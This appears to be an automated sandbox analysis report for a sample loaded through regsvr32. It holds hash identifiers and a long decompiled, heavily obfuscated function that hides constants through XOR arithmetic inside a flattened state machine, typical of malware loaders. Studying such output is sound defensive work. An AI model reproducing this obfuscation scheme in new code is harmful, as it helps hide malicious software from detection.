IF, xrefs: 04B43380
DJ3, xrefs: 04B42F28

Memory Dump Source

Source File: 00000002.00000002.651296715.0000000004B31000.00000020.00000001.sdmp, Offset: 04B30000, based on PE: true

Associated: 00000002.00000002.651288624.0000000004B30000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.651316907.0000000004B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b30000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: !s9$*a<$-3n3$1TPy$5S$8j$9I $DJ3$IF$Sg$kn_$|I9$$7$3$DO$Gd$I,
API String ID: 0-3070105227
Opcode ID: 8f9041c77e714aa8e6501df538f1178b833de04d9b5fe8388148ea3901fa555d
Instruction ID: fc815b465f5fbbb89a91d615b15031f43a3c58017eaee1f99beb6f908127688d
Opcode Fuzzy Hash: 8f9041c77e714aa8e6501df538f1178b833de04d9b5fe8388148ea3901fa555d
Instruction Fuzzy Hash: D1721E715083819BD3B8CF25C58AB9BFBE1BBC4718F10891DE5DA8A260D7B09949DF43

Uniqueness

Uniqueness Score: -1.00%

Function 04B33431, Relevance: 17.0, Strings: 13, Instructions: 746
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E04B33431(intOrPtr __ecx) {
				char _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				char* _v48;
				intOrPtr _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				char _v68;
				intOrPtr _v72;
				char _v76;
				char _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				unsigned int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				signed int _v444;
				signed int _v448;
				void* _t880;
				void* _t883;
				intOrPtr _t884;
				intOrPtr _t891;
				void* _t892;
				signed int _t894;
				char _t897;
				void* _t905;
				intOrPtr _t918;
				void* _t919;
				intOrPtr _t925;
				intOrPtr _t927;
				void* _t929;
				signed int _t935;
				signed int _t936;
				signed int _t937;
				signed int _t938;
				signed int _t939;
				signed int _t940;
				signed int _t941;
				signed int _t942;
				signed int _t943;
				signed int _t944;
				signed int _t945;
				signed int _t946;
				signed int _t947;
				signed int _t948;
				signed int _t949;
				signed int _t950;
				signed int _t951;
				void* _t952;
				intOrPtr _t974;
				intOrPtr _t977;
				void* _t1017;
				intOrPtr _t1018;
				void* _t1038;
				intOrPtr _t1039;
				void* _t1041;
				void* _t1046;
				signed int* _t1048;
				signed int* _t1052;
				void* _t1054;

				_t1048 =  &_v448;
				_v436 = 0x369131;
				_v436 = _v436 >> 0xc;
				_v72 = __ecx;
				_t1046 = 0;
				_t935 = 0x47;
				_v436 = _v436 / _t935;
				_t929 = 0xda5043f;
				_t936 = 0x5f;
				_v436 = _v436 * 0x17;
				_v436 = _v436 ^ 0x4d42455f;
				_v208 = 0xf6fdfa;
				_v208 = _v208 | 0x2cc981c8;
				_v208 = _v208 ^ 0x2cfffdfb;
				_v424 = 0xd0dd87;
				_v424 = _v424 << 0xd;
				_v424 = _v424 | 0x1c0753be;
				_v424 = _v424 << 0xb;
				_v424 = _v424 ^ 0xbf9df000;
				_v168 = 0x27916c;
				_v168 = _v168 << 0xc;
				_v168 = _v168 ^ 0x7916c000;
				_v112 = 0xb477a9;
				_v112 = _v112 << 0xb;
				_v112 = _v112 ^ 0xa3bd4800;
				_v220 = 0xe97999;
				_v220 = _v220 + 0xffffec6a;
				_v220 = _v220 ^ 0x00e96603;
				_v204 = 0x9e1a7f;
				_v204 = _v204 >> 5;
				_v204 = _v204 ^ 0x0004f0d3;
				_v268 = 0x424ea5;
				_v268 = _v268 ^ 0x63de6ac8;
				_v268 = _v268 + 0xffff47e2;
				_v268 = _v268 ^ 0x639b6c4f;
				_v260 = 0xd00e0b;
				_v260 = _v260 + 0x7bec;
				_v260 = _v260 + 0x9dda;
				_v260 = _v260 ^ 0x00d127d1;
				_v200 = 0x4c3c29;
				_v200 = _v200 + 0xffffc8b9;
				_v200 = _v200 ^ 0x004c04e2;
				_v248 = 0x4debf8;
				_v248 = _v248 + 0xffff1b2a;
				_v248 = _v248 << 9;
				_v248 = _v248 ^ 0x9a0e4400;
				_v228 = 0x8afd86;
				_v228 = _v228 / _t936;
				_v228 = _v228 << 4;
				_v228 = _v228 ^ 0x001768a0;
				_v96 = 0x2eb3c6;
				_v96 = _v96 << 0xd;
				_v96 = _v96 ^ 0xd678c020;
				_v420 = 0x274aed;
				_v420 = _v420 | 0x31740d1a;
				_v420 = _v420 + 0xffff9582;
				_v420 = _v420 | 0x350cf820;
				_v420 = _v420 ^ 0x35767196;
				_v364 = 0x6881b7;
				_v364 = _v364 * 7;
				_v364 = _v364 + 0xffffc912;
				_v364 = _v364 * 0x25;
				_v364 = _v364 ^ 0x69b6ddf9;
				_v184 = 0xd44f20;
				_v184 = _v184 ^ 0xce5a0ea9;
				_v184 = _v184 ^ 0xce89b855;
				_v264 = 0x81d5a2;
				_v264 = _v264 >> 8;
				_v264 = _v264 ^ 0x29112c15;
				_v264 = _v264 ^ 0x291faa41;
				_v100 = 0x37cb15;
				_t937 = 6;
				_v100 = _v100 * 0x62;
				_v100 = _v100 ^ 0x1559514e;
				_v380 = 0xd5dbc2;
				_v380 = _v380 ^ 0x7753e321;
				_v380 = _v380 + 0xffff7b0c;
				_v380 = _v380 << 8;
				_v380 = _v380 ^ 0x85ba1641;
				_v176 = 0xe5b425;
				_v176 = _v176 ^ 0xa878a978;
				_v176 = _v176 ^ 0xa898c785;
				_v120 = 0xd260b8;
				_v120 = _v120 / _t937;
				_v120 = _v120 ^ 0x00230c57;
				_v288 = 0xdcc1d5;
				_v288 = _v288 | 0xf1bc740f;
				_v288 = _v288 >> 0xf;
				_v288 = _v288 ^ 0x000063e4;
				_v232 = 0xe5d66a;
				_t938 = 0x2c;
				_v232 = _v232 * 0x6c;
				_v232 = _v232 / _t938;
				_v232 = _v232 ^ 0x02301c7d;
				_v296 = 0x2a124;
				_v296 = _v296 | 0xd0f8a1f6;
				_v296 = _v296 >> 3;
				_v296 = _v296 ^ 0x1a145567;
				_v160 = 0xc3c6af;
				_v160 = _v160 + 0xd2dc;
				_v160 = _v160 ^ 0x00c22786;
				_v348 = 0x8f150e;
				_v348 = _v348 + 0xa59e;
				_t939 = 0x59;
				_v348 = _v348 / _t939;
				_v348 = _v348 >> 0xe;
				_v348 = _v348 ^ 0x00038203;
				_v412 = 0x22c1c6;
				_v412 = _v412 | 0x52a0f1e9;
				_v412 = _v412 >> 0xe;
				_v412 = _v412 + 0x5f9c;
				_v412 = _v412 ^ 0x0003206f;
				_v256 = 0x6eace8;
				_v256 = _v256 | 0x5e36471d;
				_v256 = _v256 + 0xaa22;
				_v256 = _v256 ^ 0x5e7c911d;
				_v372 = 0x114227;
				_v372 = _v372 << 0xe;
				_v372 = _v372 >> 4;
				_v372 = _v372 + 0xffff3250;
				_v372 = _v372 ^ 0x05091a3a;
				_v152 = 0xb2c113;
				_v152 = _v152 | 0xd4a79ff0;
				_v152 = _v152 ^ 0xd4b69369;
				_v404 = 0xac8dd0;
				_v404 = _v404 | 0xfe2c74c4;
				_v404 = _v404 + 0xfffff2df;
				_v404 = _v404 ^ 0xd6ca137b;
				_v404 = _v404 ^ 0x2865160f;
				_v92 = 0xc872d4;
				_v92 = _v92 ^ 0x1ab36d9e;
				_v92 = _v92 ^ 0x1a793755;
				_v104 = 0x4ab196;
				_v104 = _v104 << 8;
				_v104 = _v104 ^ 0x4ab50517;
				_v448 = 0xada0e7;
				_t940 = 0x71;
				_v448 = _v448 * 0x69;
				_v448 = _v448 ^ 0xf900bd50;
				_v448 = _v448 + 0x197e;
				_v448 = _v448 ^ 0xbe3853b0;
				_v396 = 0x11e923;
				_v396 = _v396 + 0x3954;
				_v396 = _v396 / _t940;
				_v396 = _v396 >> 0xc;
				_v396 = _v396 ^ 0x00018e0c;
				_v336 = 0x5f85c1;
				_v336 = _v336 | 0x2e05641a;
				_v336 = _v336 + 0xffffe3b2;
				_v336 = _v336 ^ 0x2e57dda5;
				_v144 = 0xd04b4f;
				_v144 = _v144 | 0x24a920ad;
				_v144 = _v144 ^ 0x24f2194c;
				_v332 = 0xa51135;
				_v332 = _v332 | 0x0e3f3b11;
				_v332 = _v332 << 1;
				_v332 = _v332 ^ 0x1d7bc296;
				_v432 = 0x91d3da;
				_v432 = _v432 ^ 0xfb7827da;
				_v432 = _v432 ^ 0x8307cadb;
				_v432 = _v432 ^ 0x96a6215b;
				_v432 = _v432 ^ 0xee460da5;
				_v440 = 0x76ea73;
				_t941 = 0x68;
				_v440 = _v440 * 0x64;
				_v440 = _v440 * 0x74;
				_v440 = _v440 + 0xffff4177;
				_v440 = _v440 ^ 0x0c5f6cc4;
				_v84 = 0xe35803;
				_v84 = _v84 << 2;
				_v84 = _v84 ^ 0x038e6518;
				_v416 = 0xaf3ba8;
				_v416 = _v416 / _t941;
				_v416 = _v416 << 4;
				_v416 = _v416 ^ 0x48935165;
				_v416 = _v416 ^ 0x4881449f;
				_v212 = 0x801900;
				_v212 = _v212 + 0xffff42b5;
				_v212 = _v212 ^ 0x0072cd25;
				_v308 = 0xdd451d;
				_v308 = _v308 << 7;
				_v308 = _v308 + 0xffff5c98;
				_v308 = _v308 ^ 0x6ea87981;
				_v400 = 0xde1a46;
				_v400 = _v400 + 0xffff765a;
				_v400 = _v400 / _t941;
				_v400 = _v400 << 9;
				_v400 = _v400 ^ 0x044894be;
				_v316 = 0xd965ab;
				_t942 = 0x67;
				_v316 = _v316 / _t942;
				_v316 = _v316 ^ 0xab5bfdd1;
				_v316 = _v316 ^ 0xab5ad192;
				_v408 = 0x2ea377;
				_v408 = _v408 ^ 0x7c77aa70;
				_v408 = _v408 * 0x1b;
				_t943 = 0x5b;
				_v408 = _v408 / _t943;
				_v408 = _v408 ^ 0x00544ec9;
				_v324 = 0xbe9a08;
				_t944 = 0x3b;
				_v324 = _v324 * 0x43;
				_v324 = _v324 >> 2;
				_v324 = _v324 ^ 0x0c769314;
				_v300 = 0x976b15;
				_v300 = _v300 + 0xffff7da5;
				_v300 = _v300 ^ 0x81b758ca;
				_v300 = _v300 ^ 0x81238506;
				_v180 = 0xcec496;
				_v180 = _v180 + 0xd8a;
				_v180 = _v180 ^ 0x00c56088;
				_v188 = 0xaed086;
				_v188 = _v188 / _t944;
				_v188 = _v188 ^ 0x0009ea52;
				_v196 = 0x3b56fa;
				_v196 = _v196 ^ 0xac6111bd;
				_v196 = _v196 ^ 0xac5e4370;
				_v292 = 0x9c517b;
				_t945 = 0xe;
				_v292 = _v292 * 0x4d;
				_v292 = _v292 << 0x10;
				_v292 = _v292 ^ 0x81f0babf;
				_v164 = 0xb8b001;
				_v164 = _v164 * 0x6d;
				_v164 = _v164 ^ 0x4ea63487;
				_v172 = 0xad6cfe;
				_v172 = _v172 + 0xffff2ed4;
				_v172 = _v172 ^ 0x00a06f33;
				_v392 = 0x7c182;
				_v392 = _v392 + 0xffff354a;
				_v392 = _v392 >> 9;
				_v392 = _v392 | 0x25902c29;
				_v392 = _v392 ^ 0x259a4e3f;
				_v384 = 0x5bc0d6;
				_v384 = _v384 << 1;
				_v384 = _v384 >> 3;
				_v384 = _v384 >> 0xb;
				_v384 = _v384 ^ 0x00007445;
				_v148 = 0xb53a42;
				_v148 = _v148 + 0x9a8c;
				_v148 = _v148 ^ 0x00ba1df9;
				_v340 = 0x4937cc;
				_v340 = _v340 / _t945;
				_v340 = _v340 * 0x55;
				_v340 = _v340 ^ 0x01b4526f;
				_v156 = 0xcb2355;
				_v156 = _v156 + 0x87d8;
				_v156 = _v156 ^ 0x00cab12c;
				_v276 = 0x1d3606;
				_v276 = _v276 ^ 0xef8573e3;
				_v276 = _v276 + 0xe74c;
				_v276 = _v276 ^ 0xef9451f2;
				_v124 = 0xea90d8;
				_v124 = _v124 >> 0xc;
				_v124 = _v124 ^ 0x000c3a09;
				_v132 = 0x9d7def;
				_v132 = _v132 << 0xe;
				_v132 = _v132 ^ 0x5f719987;
				_v376 = 0x89d7c2;
				_v376 = _v376 + 0xfffff23e;
				_v376 = _v376 | 0x7c68b11f;
				_v376 = _v376 ^ 0xbb3726b5;
				_v376 = _v376 ^ 0xc7d510ca;
				_v140 = 0x76a014;
				_t946 = 0x62;
				_v140 = _v140 * 0x5d;
				_v140 = _v140 ^ 0x2b1c15f7;
				_v236 = 0x97a0b2;
				_v236 = _v236 + 0xb8c3;
				_v236 = _v236 / _t946;
				_v236 = _v236 ^ 0x00048326;
				_v244 = 0xf40f05;
				_v244 = _v244 >> 9;
				_v244 = _v244 + 0xffff2918;
				_v244 = _v244 ^ 0xfff951ac;
				_v252 = 0x8be7d4;
				_t947 = 0x63;
				_v252 = _v252 * 0x1e;
				_v252 = _v252 | 0x42cac185;
				_v252 = _v252 ^ 0x52ef1e67;
				_v116 = 0xbde76;
				_v116 = _v116 * 0x7b;
				_v116 = _v116 ^ 0x05b04958;
				_v328 = 0xeb1d65;
				_v328 = _v328 + 0xffffd1f9;
				_v328 = _v328 / _t947;
				_v328 = _v328 ^ 0x00025d34;
				_v280 = 0x68b6dc;
				_v280 = _v280 << 4;
				_v280 = _v280 + 0xffffca90;
				_v280 = _v280 ^ 0x06815cee;
				_v284 = 0x6fbf52;
				_t948 = 0x39;
				_v284 = _v284 / _t948;
				_v284 = _v284 >> 0xc;
				_v284 = _v284 ^ 0x000af32e;
				_v128 = 0xe16a7a;
				_v128 = _v128 << 0xa;
				_v128 = _v128 ^ 0x85a6bd86;
				_v136 = 0xc45446;
				_v136 = _v136 * 0x2c;
				_v136 = _v136 ^ 0x21b71382;
				_v356 = 0x71f336;
				_v356 = _v356 ^ 0x2de7f7fe;
				_v356 = _v356 ^ 0x8a07c7d3;
				_v356 = _v356 ^ 0x93c759d9;
				_v356 = _v356 ^ 0x3457e38a;
				_v444 = 0xc2e3ca;
				_v444 = _v444 + 0xd370;
				_v444 = _v444 * 0x17;
				_v444 = _v444 | 0x81628588;
				_v444 = _v444 ^ 0x91feaa64;
				_v216 = 0xda26e7;
				_v216 = _v216 | 0x60c5a9c9;
				_v216 = _v216 ^ 0x60dd12b5;
				_v192 = 0x3f7410;
				_v192 = _v192 ^ 0x1d5bbab7;
				_v192 = _v192 ^ 0x1d6fbf93;
				_v312 = 0x4ada65;
				_v312 = _v312 << 0xd;
				_v312 = _v312 >> 7;
				_v312 = _v312 ^ 0x00bfdaf9;
				_v272 = 0xabf11;
				_v272 = _v272 | 0xa59dca8e;
				_v272 = _v272 + 0x20a8;
				_v272 = _v272 ^ 0xa5a7fe59;
				_v224 = 0x8674d0;
				_t1041 = 0x129d0b2;
				_t1038 = 0x319c4b5;
				_t949 = 0x14;
				_v224 = _v224 / _t949;
				_v224 = _v224 ^ 0x000de1f0;
				_v320 = 0xda9bb0;
				_v320 = _v320 | 0x2a57cad9;
				_t950 = 0x36;
				_v320 = _v320 * 0xf;
				_v320 = _v320 ^ 0x831ebdeb;
				_v240 = 0xa163ed;
				_v240 = _v240 * 0xb;
				_v240 = _v240 ^ 0x8dcbf844;
				_v240 = _v240 ^ 0x8b2bfc33;
				_v428 = 0x5ed42b;
				_v428 = _v428 + 0xffff1d19;
				_v428 = _v428 * 0x50;
				_v428 = _v428 << 2;
				_v428 = _v428 ^ 0x75680dd8;
				_v88 = 0xfa72dc;
				_v88 = _v88 >> 7;
				_v88 = _v88 ^ 0x0007f8f8;
				_v388 = 0x10dc91;
				_v388 = _v388 / _t950;
				_v388 = _v388 >> 2;
				_v388 = _v388 | 0xaac1de12;
				_v388 = _v388 ^ 0xaac723cf;
				_v304 = 0xa7cb34;
				_v304 = _v304 ^ 0x1c82ce84;
				_v304 = _v304 + 0xffff27ec;
				_v304 = _v304 ^ 0x1c2c2c1b;
				_v360 = 0x85a407;
				_v360 = _v360 << 0x10;
				_v360 = _v360 ^ 0xf399b7e8;
				_t951 = 0x7b;
				_v360 = _v360 * 0xb;
				_v360 = _v360 ^ 0xc3d703da;
				_v108 = 0x2c5900;
				_v108 = _v108 | 0x18e96d33;
				_v108 = _v108 ^ 0x18efd740;
				_v368 = 0x82a9c5;
				_v368 = _v368 * 0x63;
				_v368 = _v368 / _t951;
				_v368 = _v368 << 9;
				_v368 = _v368 ^ 0xd254d318;
				_v344 = 0x646456;
				_v344 = _v344 | 0x8bd14a3d;
				_v344 = _v344 ^ 0xb757bf6b;
				_v344 = _v344 ^ 0xc7e8113d;
				_v344 = _v344 ^ 0xfb40f9ed;
				_v352 = 0x76afda;
				_v352 = _v352 | 0xbd2b6ebb;
				_v352 = _v352 + 0xffffcbc9;
				_v352 = _v352 << 5;
				_v352 = _v352 ^ 0xaffdfdca;
				while(1) {
					L1:
					_t1017 = 0xbed0fa7;
					_t952 = 0x2dc73db;
					_t880 = 0x45ef02b;
					goto L2;
					do {
						while(1) {
							L2:
							_t1054 = _t929 - _t880;
							if(_t1054 <= 0) {
								break;
							}
							__eflags = _t929 - 0xa3576f8;
							if(_t929 == 0xa3576f8) {
								_t1018 =  *0x4b56224; // 0x0
								L04B52B09(_v360,  *((intOrPtr*)(_t1018 + 0x50)), _v108, _v368);
								_t929 = _t1038;
								L25:
								_t880 = 0x45ef02b;
								_t952 = 0x2dc73db;
								_t1017 = 0xbed0fa7;
								goto L26;
							}
							__eflags = _t929 - _t1017;
							if(__eflags == 0) {
								_push(_v156);
								_push(_v340);
								_push(_v148);
								_t883 = E04B4E1F8(0x4b313f8, _v384, __eflags);
								_t884 =  *0x4b56224; // 0x0
								__eflags = L04B3F288(_v268, _v276, _t883, _v124,  &_v76, _t884 + 0x54, _v132, 0x4b313f8, _v376, _v80, _v140) - _v260;
								_t929 =  ==  ? 0x2dc73db : _t1038;
								E04B4FECB(_t883, _v236, _v244, _v252, _v116);
								_t1048 =  &(_t1048[0xf]);
								L15:
								_t1041 = 0x129d0b2;
								goto L25;
							}
							__eflags = _t929 - 0xda5043f;
							if(__eflags != 0) {
								goto L26;
							}
							_t929 = 0x2e16ae;
						}
						if(_t1054 == 0) {
							_push(_v336);
							_push(_v396);
							_push(_v448);
							_t891 = E04B4E1F8(0x4b313a8, _v104, __eflags);
							_push(_v440);
							_t1039 = _t891;
							_push(_v432);
							_push(_v332);
							_t892 = E04B4E1F8(0x4b31498, _v144, __eflags);
							_v64 = _v424;
							_t894 = E04B400C5(_t1039, _v84, _v416);
							_v56 = _v56 & 0x00000000;
							_v60 = _t1039;
							_v52 = 1;
							_v68 = 2 + _t894 * 2;
							_v48 =  &_v68;
							_t897 = 0x20;
							_v76 = _t897;
							__eflags = E04B349A4(_v212,  &_v56, _v308,  &_v32, _v400, _v220, _v316,  &_v76, _v72, _t897, _t892, _v408, _v324) - _v204;
							_t929 =  ==  ? 0xbed0fa7 : 0x319c4b5;
							E04B4FECB(_t1039, _v300, _v180, _v188, _v196);
							E04B4FECB(_t892, _v292, _v164, _v172, _v392);
							_t1048 =  &(_t1048[0x18]);
							L17:
							_t1038 = 0x319c4b5;
							goto L15;
						}
						if(_t929 == 0x2e16ae) {
							_push(_v264);
							_push(_v184);
							_push(_v364);
							_t905 = E04B4E1F8(0x4b31468, _v420, __eflags);
							_push(_v120);
							_push(_v176);
							_push(_v380);
							__eflags = L04B3738A(_v288, _t905, _v232, _v168,  &_v80, E04B4E1F8(0x4b31318, _v100, __eflags), _v296) - _v112;
							_t929 =  ==  ? 0x45ef02b : 0x45eecb1;
							E04B4FECB(_t905, _v160, _v348, _v412, _v256);
							E04B4FECB(_t906, _v372, _v152, _v404, _v92);
							_t1048 =  &(_t1048[0x11]);
							goto L17;
						}
						if(_t929 == _t1041) {
							_push(_v216);
							_push(_v444);
							_push(_v356);
							_t1045 = E04B4E1F8(0x4b31438, _v136, __eflags);
							_v44 = _v436;
							_v40 = _v208;
							_v36 = _v96;
							_t918 =  *0x4b56224; // 0x0
							_t974 =  *0x4b56224; // 0x0
							_t919 = E04B350E8( *((intOrPtr*)(_t974 + 0x54)), _v192, _v312, _v272, _v224,  *((intOrPtr*)(_t918 + 0x50)), _v80, _v320, 0x4b31438, 0x4b31438,  &_v44, _v200, 0x4b31438, _v240, _t913);
							_t1052 =  &(_t1048[0x10]);
							__eflags = _t919 - _v248;
							if(_t919 != _v248) {
								_t929 = 0xa3576f8;
							} else {
								_t929 = _t1038;
								_t1046 = 1;
							}
							E04B4FECB(_t1045, _v428, _v88, _v388, _v304);
							_t1048 =  &(_t1052[3]);
							goto L15;
						}
						if(_t929 == _t952) {
							_t925 =  *0x4b56224; // 0x0
							_push(_t952);
							_push(_t952);
							_t977 = E04B3C5D8( *((intOrPtr*)(_t925 + 0x54)));
							_t1048 =  &(_t1048[3]);
							_t927 =  *0x4b56224; // 0x0
							__eflags = _t977;
							_t929 =  !=  ? _t1041 : _t1038;
							 *((intOrPtr*)(_t927 + 0x50)) = _t977;
							goto L1;
						}
						if(_t929 != _t1038) {
							goto L26;
						}
						E04B3F7FE(_v344, _v80, _v352, _v228);
						L9:
						return _t1046;
						L26:
						__eflags = _t929 - 0x45eecb1;
					} while (__eflags != 0);
					goto L9;
				}
			}

0x04b33431
0x04b33437
0x04b33441
0x04b33450
0x04b33457
0x04b33459
0x04b3345e
0x04b33469
0x04b3346e
0x04b3346f
0x04b33473
0x04b3347b
0x04b33486
0x04b33491
0x04b3349c
0x04b334a4
0x04b334a9
0x04b334b1
0x04b334b6
0x04b334be
0x04b334c9
0x04b334d1
0x04b334dc
0x04b334e7
0x04b334ef
0x04b334fa
0x04b33505
0x04b33510
0x04b3351b
0x04b33526
0x04b3352e
0x04b33539
0x04b33544
0x04b3354f
0x04b3355a
0x04b33565
0x04b33570
0x04b3357b
0x04b33586
0x04b33591
0x04b3359c
0x04b335a7
0x04b335b2
0x04b335bd
0x04b335c8
0x04b335d0
0x04b335db
0x04b335ef
0x04b335f6
0x04b335fe
0x04b33609
0x04b33614
0x04b3361c
0x04b33627
0x04b3362f
0x04b33637
0x04b3363f
0x04b33647
0x04b3364f
0x04b3365c
0x04b33660
0x04b3366d
0x04b33671
0x04b33679
0x04b33684
0x04b3368f
0x04b3369a
0x04b336a5
0x04b336af
0x04b336ba
0x04b336c5
0x04b336da
0x04b336dd
0x04b336e4
0x04b336ef
0x04b336f7
0x04b336ff
0x04b33707
0x04b3370c
0x04b33714
0x04b3371f
0x04b3372a
0x04b33735
0x04b3374b
0x04b33752
0x04b3375d
0x04b33768
0x04b33773
0x04b3377b
0x04b33786
0x04b33799
0x04b3379c
0x04b337ae
0x04b337b5
0x04b337c0
0x04b337cb
0x04b337d6
0x04b337de
0x04b337e9
0x04b337f4
0x04b337ff
0x04b3380a
0x04b33812
0x04b3381e
0x04b33821
0x04b33825
0x04b3382a
0x04b33832
0x04b3383a
0x04b33842
0x04b33847
0x04b3384f
0x04b33857
0x04b33862
0x04b3386d
0x04b33878
0x04b33883
0x04b3388b
0x04b33890
0x04b33895
0x04b3389d
0x04b338a5
0x04b338b0
0x04b338bb
0x04b338c6
0x04b338ce
0x04b338d6
0x04b338de
0x04b338e6
0x04b338ee
0x04b338f9
0x04b33904
0x04b3390f
0x04b3391a
0x04b33922
0x04b3392f
0x04b3393e
0x04b33941
0x04b33945
0x04b3394d
0x04b33955
0x04b3395d
0x04b33965
0x04b33975
0x04b33979
0x04b3397e
0x04b33986
0x04b33991
0x04b3399c
0x04b339a7
0x04b339b2
0x04b339bd
0x04b339c8
0x04b339d3
0x04b339de
0x04b339e9
0x04b339f0
0x04b339fb
0x04b33a03
0x04b33a0b
0x04b33a13
0x04b33a1b
0x04b33a23
0x04b33a30
0x04b33a33
0x04b33a3c
0x04b33a40
0x04b33a48
0x04b33a50
0x04b33a5b
0x04b33a63
0x04b33a6e
0x04b33a7e
0x04b33a82
0x04b33a87
0x04b33a8f
0x04b33a97
0x04b33aa2
0x04b33aad
0x04b33ab8
0x04b33ac3
0x04b33acb
0x04b33ad6
0x04b33ae1
0x04b33ae9
0x04b33af9
0x04b33afd
0x04b33b02
0x04b33b0a
0x04b33b1c
0x04b33b1f
0x04b33b26
0x04b33b31
0x04b33b3c
0x04b33b44
0x04b33b51
0x04b33b5d
0x04b33b62
0x04b33b68
0x04b33b70
0x04b33b83
0x04b33b86
0x04b33b8d
0x04b33b95
0x04b33ba0
0x04b33bab
0x04b33bb6
0x04b33bc1
0x04b33bcc
0x04b33bd7
0x04b33be2
0x04b33bed
0x04b33c03
0x04b33c0a
0x04b33c15
0x04b33c20
0x04b33c2b
0x04b33c36
0x04b33c49
0x04b33c4a
0x04b33c51
0x04b33c59
0x04b33c64
0x04b33c77
0x04b33c7e
0x04b33c89
0x04b33c94
0x04b33c9f
0x04b33caa
0x04b33cb2
0x04b33cba
0x04b33cbf
0x04b33cc7
0x04b33ccf
0x04b33cd7
0x04b33cdb
0x04b33ce0
0x04b33ce5
0x04b33ced
0x04b33cf8
0x04b33d03
0x04b33d0e
0x04b33d1c
0x04b33d25
0x04b33d29
0x04b33d31
0x04b33d3c
0x04b33d47
0x04b33d52
0x04b33d5d
0x04b33d68
0x04b33d73
0x04b33d7e
0x04b33d89
0x04b33d91
0x04b33d9c
0x04b33da7
0x04b33daf
0x04b33dba
0x04b33dc2
0x04b33dca
0x04b33dd2
0x04b33ddc
0x04b33de4
0x04b33df9
0x04b33dfc
0x04b33e03
0x04b33e0e
0x04b33e19
0x04b33e2f
0x04b33e36
0x04b33e41
0x04b33e4c
0x04b33e54
0x04b33e5f
0x04b33e6a
0x04b33e7d
0x04b33e80
0x04b33e87
0x04b33e92
0x04b33e9d
0x04b33eb0
0x04b33eb7
0x04b33ec2
0x04b33ecd
0x04b33ee3
0x04b33eea
0x04b33ef5
0x04b33f00
0x04b33f08
0x04b33f13
0x04b33f1e
0x04b33f30
0x04b33f33
0x04b33f3a
0x04b33f42
0x04b33f4d
0x04b33f58
0x04b33f60
0x04b33f6b
0x04b33f7e
0x04b33f85
0x04b33f90
0x04b33f98
0x04b33fa0
0x04b33fa8
0x04b33fb0
0x04b33fb8
0x04b33fc0
0x04b33fcd
0x04b33fd1
0x04b33fd9
0x04b33fe1
0x04b33fec
0x04b33ff7
0x04b34002
0x04b3400d
0x04b34018
0x04b34023
0x04b3402e
0x04b34036
0x04b3403e
0x04b34049
0x04b34054
0x04b3405f
0x04b3406a
0x04b34077
0x04b34082
0x04b3408e
0x04b34095
0x04b3409a
0x04b340a3
0x04b340ae
0x04b340b9
0x04b340cc
0x04b340cf
0x04b340d6
0x04b340e1
0x04b340f4
0x04b340fb
0x04b34106
0x04b34111
0x04b34119
0x04b34126
0x04b3412a
0x04b3412f
0x04b34137
0x04b34142
0x04b3414a
0x04b34155
0x04b34165
0x04b34169
0x04b3416e
0x04b34176
0x04b3417e
0x04b34189
0x04b34194
0x04b3419f
0x04b341aa
0x04b341b2
0x04b341b7
0x04b341c4
0x04b341c5
0x04b341c9
0x04b341d1
0x04b341dc
0x04b341e7
0x04b341f2
0x04b341ff
0x04b34209
0x04b3420d
0x04b34212
0x04b3421a
0x04b34222
0x04b3422a
0x04b34232
0x04b3423a
0x04b34242
0x04b3424a
0x04b34252
0x04b3425a
0x04b3425f
0x04b34267
0x04b34267
0x04b34267
0x04b3426c
0x04b34271
0x04b34271
0x04b34276
0x04b34276
0x04b34276
0x04b34276
0x04b34278
0x00000000
0x00000000
0x04b34628
0x04b3462e
0x04b34707
0x04b34714
0x04b3471b
0x04b3471d
0x04b3471d
0x04b34722
0x04b34727
0x00000000
0x04b34727
0x04b34634
0x04b34636
0x04b3464e
0x04b3465a
0x04b34661
0x04b3466c
0x04b34690
0x04b346c7
0x04b346de
0x04b346ef
0x04b346f4
0x04b343ef
0x04b343ef
0x00000000
0x04b343ef
0x04b34638
0x04b3463e
0x00000000
0x00000000
0x04b34644
0x04b34644
0x04b3427e
0x04b344d1
0x04b344dd
0x04b344e1
0x04b344ec
0x04b344f1
0x04b344fa
0x04b344fc
0x04b34500
0x04b3450e
0x04b34526
0x04b3452d
0x04b34534
0x04b34543
0x04b34551
0x04b3455c
0x04b3456a
0x04b34571
0x04b34579
0x04b345d3
0x04b345e3
0x04b345fb
0x04b3461b
0x04b34620
0x04b344c7
0x04b344c7
0x00000000
0x04b344c7
0x04b3428a
0x04b343f9
0x04b34405
0x04b3440c
0x04b34414
0x04b34419
0x04b34427
